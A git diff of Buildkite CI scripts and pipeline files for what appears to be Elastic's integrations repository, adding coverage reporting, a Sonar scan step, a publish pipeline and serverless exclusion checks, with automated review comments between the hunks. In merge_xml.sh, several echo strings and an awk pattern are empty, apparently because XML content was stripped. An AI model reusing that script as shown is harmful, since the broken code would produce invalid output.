diff --git a/.buildkite/hooks/pre-command b/.buildkite/hooks/pre-command index 0d394803245..c9b5182c6d1 100755 --- a/.buildkite/hooks/pre-command +++ b/.buildkite/hooks/pre-command @@ -12,6 +12,7 @@ export UPLOAD_SAFE_LOGS=${UPLOAD_SAFE_LOGS:-"0"} export SERVERLESS=${SERVERLESS:-"false"} export STACK_VERSION=${STACK_VERSION:-""} export FORCE_CHECK_ALL=${FORCE_CHECK_ALL:-"false"} +export PUBLISH_COVERAGE_REPORTS=${PUBLISH_COVERAGE_REPORTS:-"false"} BASE_DIR=$(pwd) export BASE_DIR 
@@ -37,13 +38,52 @@ GITHUB_TOKEN_VAULT_PATH=kv/ci-shared/platform-ingest/github_token EC_TOKEN_PATH=kv/ci-shared/platform-ingest/platform-ingest-ec-qa EC_DATA_PATH=secret/ci/elastic-integrations/ec_data +# variables required for terraform +export ENVIRONMENT="ci" +export REPO="${REPO_NAME}" + +branch_name_label() { + local branch="$1" + + if [[ "${BUILDKITE_PULL_REQUEST}" != "false" ]] ; then + # remove fork from branch name + branch=$(echo $branch | cut -d : -f 2) + fi + + # From Jenkins + # BRANCH_NAME_LOWER_CASE = "${env.BRANCH_NAME.toLowerCase().replaceAll('[^a-z0-9-]', '-')}" + # to lower case and replace characters + branch=$(echo "$branch" | tr '[:upper:]' '[:lower:]' | tr '_/\:. ' '-') + + # truncate up to 63 characters limit + echo $branch | head -c 63 +} + +BRANCH_NAME_LOWER_CASE=$(branch_name_label "$BUILDKITE_BRANCH") +export BRANCH_NAME_LOWER_CASE +# This variable contains the build number https://buildkite.com/elastic/elastic-package/ +export BUILD_ID="${BUILDKITE_BUILD_NUMBER}" +# get current timestamp in milliseconds +# From Jenkins +# CREATED_DATE = "${new Date().getTime()}" +CREATED_DATE=$(date +%s%3N) +export CREATED_DATE + if [ -n "${ELASTIC_PACKAGE_LINKS_FILE_PATH+x}" ]; then # first upload pipeline does not have the environment variables defined in the YAML export ELASTIC_PACKAGE_LINKS_FILE_PATH=${BASE_DIR}/${ELASTIC_PACKAGE_LINKS_FILE_PATH} fi +if [[ "${BUILDKITE_PIPELINE_SLUG}" == "integrations-publish" ]]; then + if [[ "${BUILDKITE_STEP_KEY}" == "trigger-publish" ]]; then + BUILDKITE_API_TOKEN=$(retry 5 vault kv get -field buildkite_token ${BUILDKITE_API_TOKEN_PATH}) + export BUILDKITE_API_TOKEN + fi +fi + if [[ "${BUILDKITE_PIPELINE_SLUG}" == "integrations" ]]; then if [[ "${BUILDKITE_STEP_KEY}" == "trigger-publish" ]]; then + # TODO: To be removed BUILDKITE_API_TOKEN=$(retry 5 vault kv get -field buildkite_token ${BUILDKITE_API_TOKEN_PATH}) export BUILDKITE_API_TOKEN fi 
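Review bot: `branch_name_label` pipes the branch through `echo $branch | cut -d : -f 2` and `echo $branch | head -c 63` unquoted, so a branch name containing spaces or glob characters is word-split and glob-expanded before it reaches `cut`/`head`; quote it, `printf '%s' "$branch" | cut -d : -f 2` and `printf '%s' "$branch" | head -c 63`. The same hunk leaves `${BUILDKITE_API_TOKEN_PATH}` unquoted in both `vault kv get` calls, where `"${BUILDKITE_API_TOKEN_PATH}"` would match the quoting used on the surrounding lines. Note also that `cut -f 2` keeps only the second colon-separated field, so a fork branch such as `owner:feat:x` would be labelled `feat`; if that truncation is intended, a one-line comment saying so would help.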
diff --git a/.buildkite/pipeline.publish.yml b/.buildkite/pipeline.publish.yml new file mode 100644 index 00000000000..ba49e5edda1 --- /dev/null +++ b/.buildkite/pipeline.publish.yml @@ -0,0 +1,49 @@ +# yaml-language-server: $schema=https://raw.githubusercontent.com/buildkite/pipeline-schema/main/schema.json + +env: + SETUP_GVM_VERSION: "v0.5.2" + LINUX_AGENT_IMAGE: "golang:${GO_VERSION}" + DOCKER_COMPOSE_VERSION: "v2.24.1" + DOCKER_VERSION: "false" + YQ_VERSION: 'v4.35.2' + JQ_VERSION: '1.7' + # Elastic package settings + # Manage docker output/logs + ELASTIC_PACKAGE_COMPOSE_DISABLE_ANSI: "true" + ELASTIC_PACKAGE_COMPOSE_DISABLE_PULL_PROGRESS_INFORMATION: "true" + # Default license to use by `elastic-package build` + ELASTIC_PACKAGE_REPOSITORY_LICENSE: "licenses/Elastic-2.0.txt" + # Link definitions path (full path to be set in the corresponding step) + ELASTIC_PACKAGE_LINKS_FILE_PATH: "links_table.yml" + # Disable comparison of results in pipeline tests to avoid errors related to GeoIP fields + ELASTIC_PACKAGE_SERVERLESS_PIPELINE_TEST_DISABLE_COMPARE_RESULTS: "true" + NOTIFY_TO: "ecosystem-team@elastic.co" + +steps: + - label: ":white_check_mark: Check go sources" + key: "check" + command: ".buildkite/scripts/check_sources.sh" + agents: + image: "${LINUX_AGENT_IMAGE}" + cpu: "8" + memory: "4G" + + - label: ":package: Build packages" + key: "build-packages" + command: ".buildkite/scripts/build_packages.sh" + agents: + image: "${LINUX_AGENT_IMAGE}" + cpu: "8" + memory: "8G" + env: + ARTIFACTS_FOLDER: "artifacts-to-sign" + DRY_RUN: "true" + depends_on: + - step: "check" + allow_failure: false + artifact_paths: + - artifacts-to-sign/*.zip + +notify: + - email: "$NOTIFY_TO" + if: "build.state == 'failed' && build.env('BUILDKITE_PULL_REQUEST') == 'false'" diff --git a/.buildkite/pipeline.schedule-daily.yml b/.buildkite/pipeline.schedule-daily.yml index fef5d4c7943..00ca5f1d33c 100644 --- a/.buildkite/pipeline.schedule-daily.yml 
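Review bot: The `build-packages` step hard-codes `DRY_RUN: "true"` in a pipeline whose stated purpose is to publish packages, and nothing in the file says whether this is a deliberate staging placeholder; a comment next to it such as `# DRY_RUN stays on until the signing/publishing steps are added` would stop the next reader from flipping it without context. The pre-command hook changed in this same commit fetches `BUILDKITE_API_TOKEN` for a `trigger-publish` step key in the `integrations-publish` pipeline, but no step with that key exists in this file, so that branch is currently unreachable — presumably it is for a follow-up, which is worth stating in the hook or here.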
+++ b/.buildkite/pipeline.schedule-daily.yml @@ -22,19 +22,21 @@ steps: SERVERLESS: "false" SKIP_PUBLISHING: "true" FORCE_CHECK_ALL: "true" - STACK_VERSION: 7.17-SNAPSHOT + # STACK_VERSION: 7.17-SNAPSHOT # Using 7.17.19 till https://github.com/elastic/fleet-server/issues/3435 is solved. + STACK_VERSION: 7.17.19 depends_on: - step: "check" allow_failure: false - - label: "Check integrations local stacks - Stack Version v8.12" + - label: "Check integrations local stacks - Stack Version v8.14" trigger: "integrations" build: env: SERVERLESS: "false" SKIP_PUBLISHING: "true" FORCE_CHECK_ALL: "true" - STACK_VERSION: 8.12-SNAPSHOT + STACK_VERSION: 8.14.0-SNAPSHOT + PUBLISH_COVERAGE_REPORTS: "true" depends_on: - step: "check" allow_failure: false @@ -58,3 +60,10 @@ steps: depends_on: - step: "check" allow_failure: false + + - label: ":package: Publish missing packages" + key: "trigger-integrations-publish" + trigger: "integrations-publish" + depends_on: + - step: "check" + allow_failure: false diff --git a/.buildkite/pipeline.serverless.yml b/.buildkite/pipeline.serverless.yml index b9a94a0396f..b77b7c7fce8 100644 --- a/.buildkite/pipeline.serverless.yml +++ b/.buildkite/pipeline.serverless.yml @@ -1,7 +1,7 @@ # yaml-language-server: $schema=https://raw.githubusercontent.com/buildkite/pipeline-schema/main/schema.json env: - SETUP_GVM_VERSION: "v0.5.1" + SETUP_GVM_VERSION: "v0.5.2" LINUX_AGENT_IMAGE: "golang:${GO_VERSION}" DOCKER_COMPOSE_VERSION: "v2.24.1" DOCKER_VERSION: "false" diff --git a/.buildkite/pipeline.yml b/.buildkite/pipeline.yml index 3f37cb011f4..df3e5f0c778 100644 --- a/.buildkite/pipeline.yml +++ b/.buildkite/pipeline.yml @@ -1,7 +1,7 @@ # yaml-language-server: $schema=https://raw.githubusercontent.com/buildkite/pipeline-schema/main/schema.json env: - SETUP_GVM_VERSION: "v0.5.1" + SETUP_GVM_VERSION: "v0.5.2" LINUX_AGENT_IMAGE: "golang:${GO_VERSION}" DOCKER_COMPOSE_VERSION: "v2.24.1" DOCKER_VERSION: "false" 
@@ -67,6 +67,15 @@ steps: cpu: "8" memory: "4G" + - label: ":sonarqube: Continuous Code Inspection" + env: + VAULT_SONAR_TOKEN_PATH: "kv/ci-shared/platform-ingest/elastic/integrations/sonar-analyze-token" + agents: + image: "docker.elastic.co/cloud-ci/sonarqube/buildkite-scanner:latest" + command: ".buildkite/scripts/run_sonar_scanner.sh" + artifact_paths: + - build/test-coverage/coverage_merged.xml + - label: ":junit: Junit annotate" plugins: - junit-annotate#v2.4.1: diff --git a/.buildkite/pull-requests.json b/.buildkite/pull-requests.json index d5981deec5d..2a3aa98cbef 100644 --- a/.buildkite/pull-requests.json +++ b/.buildkite/pull-requests.json @@ -47,6 +47,22 @@ "skip_target_branches": [], "skip_ci_on_only_changed": [], "always_require_ci_on_changed": [] + }, + { + "enabled": false, + "pipelineSlug": "integrations-publish", + "allow_org_users": true, + "allowed_repo_permissions": ["admin", "write"], + "allowed_list": [], + "set_commit_status": false, + "build_on_commit": false, + "build_on_comment": false, + "trigger_comment_regex": "", + "always_trigger_comment_regex": "", + "skip_ci_labels": [], + "skip_target_branches": [], + "skip_ci_on_only_changed": [], + "always_require_ci_on_changed": [] } ] } diff --git a/.buildkite/scripts/backport_branch.sh b/.buildkite/scripts/backport_branch.sh index 4481c1cd325..ef3ebc96c29 100755 --- a/.buildkite/scripts/backport_branch.sh +++ b/.buildkite/scripts/backport_branch.sh @@ -84,6 +84,7 @@ removeOtherPackages() { updateBackportBranchContents() { local BUILDKITE_FOLDER_PATH=".buildkite" local JENKINS_FOLDER_PATH=".ci" + local files_cached_num="" if git ls-tree -d --name-only main:.ci >/dev/null 2>&1; then git checkout $BACKPORT_BRANCH_NAME echo "Copying $BUILDKITE_FOLDER_PATH from $SOURCE_BRANCH..." 
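Review bot: The new `:sonarqube:` step pulls `docker.elastic.co/cloud-ci/sonarqube/buildkite-scanner:latest`, so the scanner code that runs on every build — and that handles the coverage artifacts and the token referenced by `VAULT_SONAR_TOKEN_PATH` — changes whenever that tag is moved, outside this repository's review. Pin it to an immutable tag or digest, e.g. `image: "docker.elastic.co/cloud-ci/sonarqube/buildkite-scanner:<pinned-tag-or-digest>"` (placeholder), as the other tool versions in this pipeline (`SETUP_GVM_VERSION`, `DOCKER_COMPOSE_VERSION`) already are. A short comment on the step noting that `.buildkite/scripts/run_sonar_scanner.sh` decides whether a scan actually runs would also help readers of the pipeline, since the step itself has no `if:` condition.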
@@ -108,15 +109,26 @@ updateBackportBranchContents() { git config --global user.name "${GITHUB_USERNAME_SECRET}" git config --global user.email "${GITHUB_EMAIL_SECRET}" + echo "Commiting" + git add $BUILDKITE_FOLDER_PATH + if [ -d "${JENKINS_FOLDER_PATH}" ]; then + git add $JENKINS_FOLDER_PATH + fi + git add $PACKAGES_FOLDER_PATH/ + git status + + files_cached_num=$(git diff --name-only --cached | wc -l) + if [ "${files_cached_num}" -gt 0 ]; then + git commit -m "Add $BUILDKITE_FOLDER_PATH and $JENKINS_FOLDER_PATH to backport branch: $BACKPORT_BRANCH_NAME from the $SOURCE_BRANCH branch" + else + echo "Nothing to commit, skip." + fi + if [ "$DRY_RUN" == "true" ];then echo "DRY_RUN mode, nothing will be pushed." git diff $SOURCE_BRANCH...$BACKPORT_BRANCH_NAME else - echo "Commiting and pushing..." - git add $BUILDKITE_FOLDER_PATH - git add $JENKINS_FOLDER_PATH - git add $PACKAGES_FOLDER_PATH/ - git commit -m "Add $BUILDKITE_FOLDER_PATH and $JENKINS_FOLDER_PATH to backport branch: $BACKPORT_BRANCH_NAME from the $SOURCE_BRANCH branch" + echo "Pushing..." git push origin $BACKPORT_BRANCH_NAME fi } 
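Review bot: The new commit guard counts `git diff --name-only --cached | wc -l`, turning a list of paths into a number only to compare it with 0; `git diff --cached --quiet` answers the same question directly and does not depend on one path per line, so `if ! git diff --cached --quiet; then git commit -m "Add ..."; else echo "Nothing to commit, skip."; fi` is the cleaner form. The added `git add` lines still expand `$BUILDKITE_FOLDER_PATH`, `$JENKINS_FOLDER_PATH` and `$PACKAGES_FOLDER_PATH/` unquoted; the first two are fixed locals, but `PACKAGES_FOLDER_PATH` is defined outside this hunk and deserves the same `"${...}"` quoting the `-d` test on the line above uses. `echo "Commiting"` also carries a typo (`Committing`). `updateBackportBranchContents` begins before this hunk.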
@@ -152,15 +164,15 @@ if branchExist "$BACKPORT_BRANCH_NAME"; then fi # backport branch does not exist, running checks and create branch -echo "Check the entered version and PACKAGE_VERSION are equal" -version="$(cat packages/${PACKAGE_NAME}/manifest.yml | yq -r .version)" +version="$(git show "${BASE_COMMIT}":"packages/${PACKAGE_NAME}/manifest.yml" | yq -r .version)" +echo "Check if version from ${BASE_COMMIT} (${version}) matches with version from input step ${PACKAGE_VERSION}" if [[ "${version}" != "${PACKAGE_VERSION}" ]]; then buildkite-agent annotate "Unexpected version found in packages/${PACKAGE_NAME}/manifest.yml" --style "error" exit 1 fi echo "Check that this changeset is the one creating the version $PACKAGE_NAME" -if ! git show -p ${BASE_COMMIT} packages/${PACKAGE_NAME}/manifest.yml | grep -E "^\+version: ${PACKAGE_VERSION}" ; then +if ! git show -p ${BASE_COMMIT} packages/${PACKAGE_NAME}/manifest.yml | grep -E "^\+version: \"{0,1}${PACKAGE_VERSION}" ; then buildkite-agent annotate "This changeset does not creates the version ${PACKAGE_VERSION}" --style "error" exit 1 fi @@ -172,4 +184,7 @@ MSG="The backport branch: **$BACKPORT_BRANCH_NAME** has been created." echo "Adding CI files into the branch ${BACKPORT_BRANCH_NAME}" updateBackportBranchContents +if [ "${DRY_RUN}" == "true" ]; then + MSG="[DRY_RUN] ${MSG}." +fi buildkite-agent annotate "$MSG" --style "success" diff --git a/.buildkite/scripts/common.sh b/.buildkite/scripts/common.sh index 350cc54fd29..37dfdfc7565 100755 --- a/.buildkite/scripts/common.sh +++ b/.buildkite/scripts/common.sh @@ -15,6 +15,8 @@ export ELASTIC_PACKAGE_BIN=${WORKSPACE}/build/elastic-package API_BUILDKITE_PIPELINES_URL="https://api.buildkite.com/v2/organizations/elastic/pipelines/" +COVERAGE_FORMAT="generic" +COVERAGE_OPTIONS="--test-coverage --coverage-format=${COVERAGE_FORMAT}" running_on_buildkite() { if [[ "${BUILDKITE:-"false"}" == "true" ]]; then 
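Review bot: The widened check `grep -E "^\+version: \"{0,1}${PACKAGE_VERSION}"` interpolates `PACKAGE_VERSION`, which the new log line says comes from the input step, into an unescaped extended regex with no end anchor: the dots match any character and `1.2.3` also accepts `1.2.30` or `1x2y3`, so a slightly wrong input can still pass the "this changeset creates the version" check. Escape the dots and anchor the end, e.g. `grep -E "^\+version: \"?${PACKAGE_VERSION//./\\.}\"?[[:space:]]*$"`. The preceding `git show "${BASE_COMMIT}":"packages/${PACKAGE_NAME}/manifest.yml"` quotes its arguments while `git show -p ${BASE_COMMIT} packages/${PACKAGE_NAME}/manifest.yml` on the next line still does not; quoting both consistently would make the pair easier to read.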
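Review bot: `MSG="[DRY_RUN] ${MSG}."` appends a period to a message that, per the hunk header line `MSG="The backport branch: **$BACKPORT_BRANCH_NAME** has been created."`, already ends with one, so the dry-run annotation reads `...has been created..`. Drop the trailing period, `MSG="[DRY_RUN] ${MSG}"`.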
@@ -331,15 +333,90 @@ kibana_version_manifest() { } capabilities_manifest() { - cat manifest.yml | yq ".conditions.elastic.capabilities" + # 1) Expected format + # conditions: + # elastic: + # capabilities: + # - observability + # - uptime + # expected output: + # "observability" + # "uptime" + # 2) Expected format + # conditions: + # elastic: + # capabilities: [observability, uptime] + # expected output: + # "observability" + # "uptime" + local capabilities="" + capabilities=$(cat manifest.yml | yq -M -r -o json ".conditions.elastic.capabilities") + if [[ "$capabilities" != "null" ]]; then + echo "$capabilities" | jq '.[]' + return + fi + echo "$capabilities" +} + +capabilities_in_kibana() { + # Expected format + # xpack.fleet.internal.registry.capabilities: [ + # 'apm', + # 'observability', + # 'uptime', + # ] + # Expected output: + # "apm" + # "observability" + # "uptime" + cat "${KIBANA_CONFIG_FILE_PATH}" | yq -M -r -o json '."xpack.fleet.internal.registry.capabilities"' | jq '.[]' +} + +packages_excluded() { + # Expected format: + # xpack.fleet.internal.registry.excludePackages: [ + # # Security integrations + # 'endpoint', + # 'beaconing', + # 'osquery_manager', + # ] + # required double quotes to ensure that the package is checked (e.g. 
synthetics synthetics_dashboard) + # excluded_packages must be: + # "endpoint" + # "beaconing" + # "osquery_manager" + local config_file_path=$1 + local excluded_packages="" + excluded_packages=$(cat "${config_file_path}" | yq -M -r -o json '."xpack.fleet.internal.registry.excludePackages"') + if [[ "${excluded_packages}" != "null" ]]; then + echo "${excluded_packages}" | jq '.[]' + return + fi + echo "${excluded_packages}" +} + +is_package_excluded() { + local package=$1 + local config_file_path=$2 + local excluded_packages="" + + excluded_packages=$(packages_excluded "${config_file_path}") + if [[ "${excluded_packages}" == "null" ]]; then + return 1 + fi + if echo "${excluded_packages}" | grep -q -E "\"${package}\""; then + return 0 + fi + return 1 } + is_supported_capability() { if [ "${SERVERLESS_PROJECT}" == "" ]; then return 0 fi - local capabilities + local capabilities="" capabilities=$(capabilities_manifest) # if no capabilities defined, it is available iavailable all projects @@ -347,23 +424,24 @@ is_supported_capability() { return 0 fi - if [[ ${SERVERLESS_PROJECT} == "observability" ]]; then - if echo "${capabilities}" | grep -E 'apm|observability|uptime' ; then - return 0 - else - return 1 - fi + local capabilities_kibana_grep="" + + capabilities_kibana_grep=$(capabilities_in_kibana | tr -d '\n' | sed 's/""/"|"/g') + # Expected value of "capabilities_kibana" + # "apm"|"observability"|"uptime" + + # if there is no key defined in kibana, allow to be tested + if [[ ${capabilities_kibana_grep} == "null" ]]; then + return 0 fi - if [[ ${SERVERLESS_PROJECT} == "security" ]]; then - if echo "${capabilities}" | grep -E 'security' ; then - return 0 - else + for cap in ${capabilities}; do + if ! echo "${cap}" | grep -q -E "${capabilities_kibana_grep}"; then return 1 fi - fi + done - return 1 + return 0 } is_supported_stack() { 
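Review bot: `capabilities_in_kibana` pipes straight into `jq '.[]'` without the `!= "null"` guard that `capabilities_manifest` and `packages_excluded` in the same hunk apply; when the Kibana config has no `xpack.fleet.internal.registry.capabilities` key, jq rejects iterating over null and prints nothing on stdout, so the `[[ ${capabilities_kibana_grep} == "null" ]]` test in the following `is_supported_capability` hunk never fires and the resulting empty pattern makes `grep -q -E ""` match every capability — the same outcome, but by accident. Mirror the guard: capture into a local, echo the raw value and `return` when it is `null`, and only otherwise pipe through `jq '.[]'`, exactly as `packages_excluded` does. In `is_package_excluded`, `grep -q -E "\"${package}\""` treats the package name as a regex; `grep -q -x -F "\"${package}\""` states the intent (literal, whole-line match) and makes the double-quote trick described in the comment easier to reason about. The `cat "${config_file_path}" | yq ...` and `cat manifest.yml | yq ...` pairs can pass the file to `yq` directly.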
@@ -570,7 +648,7 @@ is_pr_affected() { local from=${2:-""} local to=${3:-""} - echo "[${package}] Original commits: from '${from}' - to: '${to}'" + echoerr "[${package}] Original commits: from '${from}' - to: '${to}'" if ! is_supported_stack ; then echo "[${package}] PR is not affected: unsupported stack (${STACK_VERSION})" @@ -578,6 +656,10 @@ is_pr_affected() { fi if is_serverless; then + if is_package_excluded "${package}" "${WORKSPACE}/kibana.serverless.config.yml"; then + echo "[${package}] PR is not affected: package ${package} excluded in Kibana config for ${SERVERLESS_PROJECT}" + return 1 + fi if ! is_supported_capability ; then echo "[${package}] PR is not affected: capabilities not mached with the project (${SERVERLESS_PROJECT})" return 1 @@ -685,11 +767,11 @@ install_package() { test_package_in_local_stack() { local package=$1 - TEST_OPTIONS="-v --report-format xUnit --report-output file --test-coverage" + TEST_OPTIONS="-v --report-format xUnit --report-output file" echo "Test package: ${package}" # Run all test suites - ${ELASTIC_PACKAGE_BIN} test ${TEST_OPTIONS} + ${ELASTIC_PACKAGE_BIN} test ${TEST_OPTIONS} ${COVERAGE_OPTIONS} local ret=$? echo "" return $ret @@ -703,10 +785,10 @@ test_package_in_serverless() { TEST_OPTIONS="-v --report-format xUnit --report-output file" echo "Test package: ${package}" - if ! ${ELASTIC_PACKAGE_BIN} test asset ${TEST_OPTIONS} --test-coverage ; then + if ! ${ELASTIC_PACKAGE_BIN} test asset ${TEST_OPTIONS} ${COVERAGE_OPTIONS}; then return 1 fi - if ! ${ELASTIC_PACKAGE_BIN} test static ${TEST_OPTIONS} --test-coverage ; then + if ! ${ELASTIC_PACKAGE_BIN} test static ${TEST_OPTIONS} ${COVERAGE_OPTIONS}; then return 1 fi # FIXME: adding test-coverage for serverless results in errors like this: diff --git a/.buildkite/scripts/find_oldest_supported_version.py b/.buildkite/scripts/find_oldest_supported_version.py index 75950ad019c..82662a84f6d 100644 --- a/.buildkite/scripts/find_oldest_supported_version.py 
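Review bot: `is_pr_affected` passes the literal `"${WORKSPACE}/kibana.serverless.config.yml"` to `is_package_excluded`, duplicating the path that `test_integrations_with_serverless.sh` exports as `KIBANA_CONFIG_FILE_PATH` in this same commit and that `capabilities_in_kibana` already reads from that variable; if the download location changes, this call checks a file that does not exist and what happens next depends on the caller's `set -e`/`pipefail` settings rather than on an explicit check. Pass `"${KIBANA_CONFIG_FILE_PATH}"` here instead, and consider a `[[ -r "${config_file_path}" ]]` guard in `is_package_excluded` so a missing config is reported rather than silently treated as "no exclusions". `is_pr_affected` starts before this hunk.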
+++ b/.buildkite/scripts/find_oldest_supported_version.py @@ -18,7 +18,9 @@ def find_oldest_supported_version(kibana_version_condition: str) -> str: if "||" in kibana_version_condition and kibana_version_condition.index("||") >= 0: return handle_or(kibana_version_condition) - available_versions = fetch_version() + artifacts_versions = fetch_version() + available_versions = artifacts_versions.get("versions", []) + available_aliases = artifacts_versions.get("aliases", []) version = remove_operator(kibana_version_condition) parts = version.split(".") @@ -32,22 +34,22 @@ def find_oldest_supported_version(kibana_version_condition: str) -> str: # Use the snapshot if this is the last patch version. next_patch = ".".join((major, minor, str(int(patch)+1))) next_patch_exists = ( - next_patch in available_versions.get("versions", []) or - f"{next_patch}-SNAPSHOT" in available_versions.get("versions", []) + next_patch in available_versions or + f"{next_patch}-SNAPSHOT" in available_versions ) snapshot_version = f"{version}-SNAPSHOT" - if not next_patch_exists and (snapshot_version in available_versions.get("versions", [])): + if not next_patch_exists and (snapshot_version in available_versions): return snapshot_version # Use the version as is if it exists. - if version in available_versions.get("version", []): + if version in available_versions: return version # Old minors may not be available in artifacts-api, if it is older # than the others in the same major, return the version as is. older = True - for available_version in available_versions.get("versions", []): + for available_version in available_versions: available_parts = available_version.split(".") if len(available_parts) < 2: continue 
@@ -63,7 +65,7 @@ def find_oldest_supported_version(kibana_version_condition: str) -> str: # If no version has been found so far, try with the snapshot of the next version # in the current major. major_snapshot = f"{major}.x-SNAPSHOT" - if major_snapshot in available_versions.get("aliases", []): + if major_snapshot in available_aliases: return major_snapshot # Otherwise, return it, whatever this is. diff --git a/.buildkite/scripts/merge_xml.sh b/.buildkite/scripts/merge_xml.sh new file mode 100755 index 00000000000..01d910d4394 --- /dev/null +++ b/.buildkite/scripts/merge_xml.sh @@ -0,0 +1,29 @@ +#!/bin/bash + +set -euo pipefail + +# Script to merge all the coverage XML files into just one file. +# It supports XML files using generic test coverage report format: +# https://docs.sonarsource.com/sonarqube/9.8/analyzing-source-code/test-coverage/generic-test-data/#generic-test-coverage + +sourceFolder="build/test-coverage" +mergedCoverageFileName="coverage_merged.xml" + +pushd "${sourceFolder}" > /dev/null +echo "Generating ${mergedCoverageFileName} into ${sourceFolder}..." +echo '' > "${mergedCoverageFileName}" +echo '' >> "${mergedCoverageFileName}" + +for file in coverage-*.xml; do + if [[ "$file" == "${mergedCoverageFileName}" ]]; then + continue + fi + echo " - Adding ${file}" + sed '1d;$d' "$file" | awk '//' >> "${mergedCoverageFileName}" +done + +echo '' >> "${mergedCoverageFileName}" +echo 'Done' + +popd > /dev/null + diff --git a/.buildkite/scripts/run_sonar_scanner.sh b/.buildkite/scripts/run_sonar_scanner.sh new file mode 100755 index 00000000000..55650d26ee7 --- /dev/null +++ b/.buildkite/scripts/run_sonar_scanner.sh 
@@ -0,0 +1,36 @@ +#!/bin/bash +set -euo pipefail + +run_sonar_scanner() { + local message="" + echo "--- Download coverage reports and merge them" + if ! buildkite-agent artifact download build/test-coverage/coverage-*.xml . ; then + message="Could not download XML artifacts. Skip coverage." + echo "--- :boom: ${message}" + buildkite-agent annotate \ + "[Code inspection] ${message}" \ + --context "ctx-sonarqube-no-files" \ + --style "warning" + exit 0 + fi + + echo "Merge all coverage reports" + .buildkite/scripts/merge_xml.sh + + echo "--- Execute sonar scanner CLI" + /scan-source-code.sh +} + +if [[ "${PUBLISH_COVERAGE_REPORTS:-"false"}" == "true" ]]; then + echo "Enabled sonnar scanner by PUBLISH_COVERAGE_REPORTS variable (Pipeline ${BUILDKITE_PIPELINE_SLUG})" + run_sonar_scanner + exit 0 +fi + +if [[ "${BUILDKITE_PULL_REQUEST}" != "false" ]]; then + echo "Run sonar scanner from Pull Request (Pipeline ${BUILDKITE_PIPELINE_SLUG})" + run_sonar_scanner + exit 0 +fi + +echo "Skip coverage report" diff --git a/.buildkite/scripts/test_integrations_with_serverless.sh b/.buildkite/scripts/test_integrations_with_serverless.sh index de362c7d759..3a438fad2d1 100755 --- a/.buildkite/scripts/test_integrations_with_serverless.sh +++ b/.buildkite/scripts/test_integrations_with_serverless.sh @@ -27,6 +27,14 @@ if running_on_buildkite; then buildkite-agent annotate "Serverless Project: ${SERVERLESS_PROJECT}" --context "ctx-info-${SERVERLESS_PROJECT}" --style "info" fi +# Download config files from kibana +kibana_url="https://raw.githubusercontent.com/elastic/kibana/main/config/serverless.oblt.yml" +if [[ "$SERVERLESS_PROJECT" == "security" ]]; then + kibana_url="https://raw.githubusercontent.com/elastic/kibana/main/config/serverless.security.yml" +fi +export KIBANA_CONFIG_FILE_PATH="${WORKSPACE}/kibana.serverless.config.yml" +curl -sSL -o "${KIBANA_CONFIG_FILE_PATH}" "${kibana_url}" + if [ ! -d packages ]; then echo "Missing packages folder" if running_on_buildkite ; then 
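Review bot: `run_sonar_scanner.sh` reads `"${BUILDKITE_PULL_REQUEST}"` under `set -u` without a default, while `PUBLISH_COVERAGE_REPORTS` two lines earlier gets `:-"false"`; run outside a Buildkite PR context the script aborts with an unbound-variable error instead of reaching `echo "Skip coverage report"`. Use `"${BUILDKITE_PULL_REQUEST:-false}"` for the same defensive default. The log line `Enabled sonnar scanner ...` also has a typo (`sonar`).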
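Review bot: `curl -sSL -o "${KIBANA_CONFIG_FILE_PATH}" "${kibana_url}"` has no `-f`/`--fail`, so an HTTP error response (for example if the upstream file is moved) is written to the config path with exit status 0; `set -e` does not notice, and the later `yq` parsing in `packages_excluded`/`capabilities_in_kibana` runs against an error page rather than YAML, quietly degrading the exclusion and capability checks. Use `curl -fsSL --retry 3 -o "${KIBANA_CONFIG_FILE_PATH}" "${kibana_url}"` so a failed download stops the job. A comment noting that the config is fetched from Kibana's `main` branch — so these checks track upstream `main` rather than the stack version under test — would also help anyone debugging a surprising exclusion.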
diff --git a/.buildkite/scripts/trigger_integrations_in_parallel.sh b/.buildkite/scripts/trigger_integrations_in_parallel.sh index 1466f399aa8..e7433a0d2d4 100755 --- a/.buildkite/scripts/trigger_integrations_in_parallel.sh +++ b/.buildkite/scripts/trigger_integrations_in_parallel.sh @@ -59,6 +59,7 @@ for package in ${PACKAGE_LIST}; do UPLOAD_SAFE_LOGS: ${UPLOAD_SAFE_LOGS} artifact_paths: - build/test-results/*.xml + - build/test-coverage/*.xml - build/benchmark-results/*.json - build/elastic-stack-dump/*/logs/*.log - build/elastic-stack-dump/*/logs/fleet-server-internal/**/* diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 59df894e173..90c974ce35a 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -72,6 +72,8 @@ /packages/azure/data_stream/provisioning @elastic/obs-infraobs-integrations /packages/azure/data_stream/signinlogs @elastic/obs-infraobs-integrations /packages/azure/data_stream/springcloudlogs @elastic/obs-infraobs-integrations +/packages/azure/data_stream/application_gateway @elastic/security-service-integrations +/packages/azure/data_stream/firewall_logs @elastic/security-service-integrations /packages/azure_app_service @elastic/obs-infraobs-integrations /packages/azure_app_service/data_stream/app_service_logs @elastic/obs-infraobs-integrations /packages/azure_application_insights @elastic/obs-infraobs-integrations @@ -108,6 +110,7 @@ /packages/cel @elastic/security-service-integrations /packages/ceph @elastic/obs-infraobs-integrations /packages/checkpoint @elastic/sec-deployment-and-devices +/packages/cisa_kevs @elastic/security-service-integrations /packages/cisco_aironet @elastic/sec-deployment-and-devices /packages/cisco_asa @elastic/sec-deployment-and-devices /packages/cisco_duo @elastic/security-service-integrations 
@@ -194,6 +197,7 @@
 /packages/ibmmq @elastic/obs-infraobs-integrations
 /packages/iis @elastic/obs-infraobs-integrations
 /packages/imperva @elastic/sec-deployment-and-devices
+/packages/imperva_cloud_waf @elastic/security-service-integrations
 /packages/influxdb @elastic/obs-infraobs-integrations
 /packages/infoblox @elastic/security-service-integrations
 /packages/infoblox_bloxone_ddi @elastic/security-service-integrations
@@ -218,14 +222,17 @@
 /packages/lmd @elastic/ml-ui @elastic/sec-applied-ml
 /packages/log @elastic/elastic-agent-data-plane
 /packages/logstash @elastic/stack-monitoring
+/packages/lumos @elastic/security-service-integrations
 /packages/lyve_cloud @elastic/security-service-integrations
 /packages/m365_defender @elastic/security-service-integrations
 /packages/mattermost @elastic/security-service-integrations
 /packages/memcached @elastic/obs-infraobs-integrations
+/packages/menlo @elastic/security-service-integrations
 /packages/microsoft_defender_cloud @elastic/security-service-integrations
 /packages/microsoft_defender_endpoint @elastic/security-service-integrations
 /packages/microsoft_dhcp @elastic/sec-windows-platform
